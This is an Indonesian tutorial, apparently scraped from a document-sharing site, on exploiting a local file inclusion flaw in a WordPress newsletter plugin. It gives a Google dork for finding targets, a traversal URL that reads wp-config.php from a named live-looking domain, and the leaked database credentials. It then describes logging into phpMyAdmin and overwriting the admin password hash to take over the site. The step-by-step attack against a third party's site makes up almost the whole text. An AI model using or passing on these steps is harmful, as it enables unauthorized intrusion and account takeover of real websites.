7
©Jihad_Irhaby Page 1 Exploitasi serangan LFI pada plugin wordpress untuk pemanfaatan di MySql untuk mengganti password login Pada Tutorial kali ini, kita akan mencoba memanfaat kan plugin wordpress yang memiliki celah LFI. Kita akan mencoba dengan Plugin Newsletter Version 1.5. Untuk google Dork nya inurl:/wp-content/plugins/plugin-newsletter/ Inilah PoC nya : http://www.target.com/wordpress/wp-content/plugins/plugin- newsletter/preview.php?data=../../../../wp-config.php Sekarang, kita tentukan Target... Ini dia. Singkat cerita, kita telah melakukan Scan directory menggunakan Acunetix terhadap web tersebut.

LFI + Edit Password Login Di MySql

Embed Size (px)

Citation preview

Page 1: LFI + Edit Password Login Di MySql

©Jihad_Irhaby Page 1

Exploitasi serangan LFI pada plugin wordpress untuk

pemanfaatan di MySql untuk mengganti password

login

Pada Tutorial kali ini, kita akan mencoba memanfaat kan plugin wordpress yang memiliki celah LFI.

Kita akan mencoba dengan Plugin Newsletter Version 1.5.

Untuk google Dork nya inurl:/wp-content/plugins/plugin-newsletter/

Inilah PoC nya : http://www.target.com/wordpress/wp-content/plugins/plugin-

newsletter/preview.php?data=../../../../wp-config.php

Sekarang, kita tentukan Target...

Ini dia.

Singkat cerita, kita telah melakukan Scan directory menggunakan Acunetix terhadap web tersebut.

Page 2: LFI + Edit Password Login Di MySql

©Jihad_Irhaby Page 2

Dan terlihat sebuah folder Newsletter. Di dalam “preview.php” terdapat vuln code yaitu:

Dari code tersebut, dapat kita panggil Url yaitu:

http://jeng-ko-lah.co.id/wp-content/plugins/newsletter/preview.php?data=../../../../wp-config.php

Pertanyaan: Kenapa ../../../../wp-config.php???

Karena dari wp-config.php tersebut, kita dapat melihat konfigurasi dari database yang dipakai saat

penginstallan website tersebut. Dari wp-config.php tersebut, dapat kita ambil, dimana posisi

database, user, serta password database... hehehe

Dan terlihat seperti di bawah ini.

Kemudian klik Lihat Kode Sumber Laman.

..........

$data = file_get_contents("templates/" . $_GET['data']);

$data = preg_replace("#/\*(.*)\*/#Uis", "", $data);

$data = str_replace("[TITLE]", "Meine Homepage", $data);

$data = str_replace("[SUBJECT]", "Testnewsletter vom " . date("d.m."), $data);

.........

Page 3: LFI + Edit Password Login Di MySql

©Jihad_Irhaby Page 3

Setelah itu akan muncul source code nya.

Dari tampilan di atas, kita dapat mengambil data yaitu:

Nama Database : WebsitE

User Database : root

Password : janganlagi

Lokasi database : localhost “berarti satu server dengan web tersebut.”

Sekarang kita akan mencoba mengakses database.

Kita lihat apakah ada port 3306 yang terbuka. Jika ada, kita menggunakan Navicat.

Page 4: LFI + Edit Password Login Di MySql

©Jihad_Irhaby Page 4

Tapi, pada kasus website ini, tidak ada port 3306 yang terbuka.

Maka kita harus mencari jalan lain.

Gunakan Havij untuk scan admin login website, disertai dengan berdoa semoga ada loginpage

bernama /phpmyadmin.

Alhamdulillah... ternyata ada..

Page 5: LFI + Edit Password Login Di MySql

©Jihad_Irhaby Page 5

Setelah itu, kita panggil url http://jeng-ko-lah.co.id/phpmyadmin

Login menggunakan data yang telah kita dapat tadi, yaitu root ; janganlagi

Setelah itu, didalam database WebsitE, kita cari tabel yang berhubungan dengan user, seperti wp-

user, kemudian otak-atik lah bagian kolom userlogin dan userpass.

Page 6: LFI + Edit Password Login Di MySql

©Jihad_Irhaby Page 6

Kemudian kita ganti user pass tersebut dengan password wordpress yang telah kita ketahui,

misalnya $P$Bc41azMcuqGWmiR9KmKnhm7hWfEntb0 . jika dei decrypt, password tersebut adalah

“jengkol”

Maka kita ganti userpass admin nya dengan $P$Bc41azMcuqGWmiR9KmKnhm7hWfEntb0

Setelah itu, klik GO..

Selesai..

Tinggal login ke wordpress

Login admin ; jengkol

Page 7: LFI + Edit Password Login Di MySql

©Jihad_Irhaby Page 7

Setelah muncul Dasbor wordpress, tinggal terserah agan2 n sista2 sekalian deh..

:::::TAMAT::::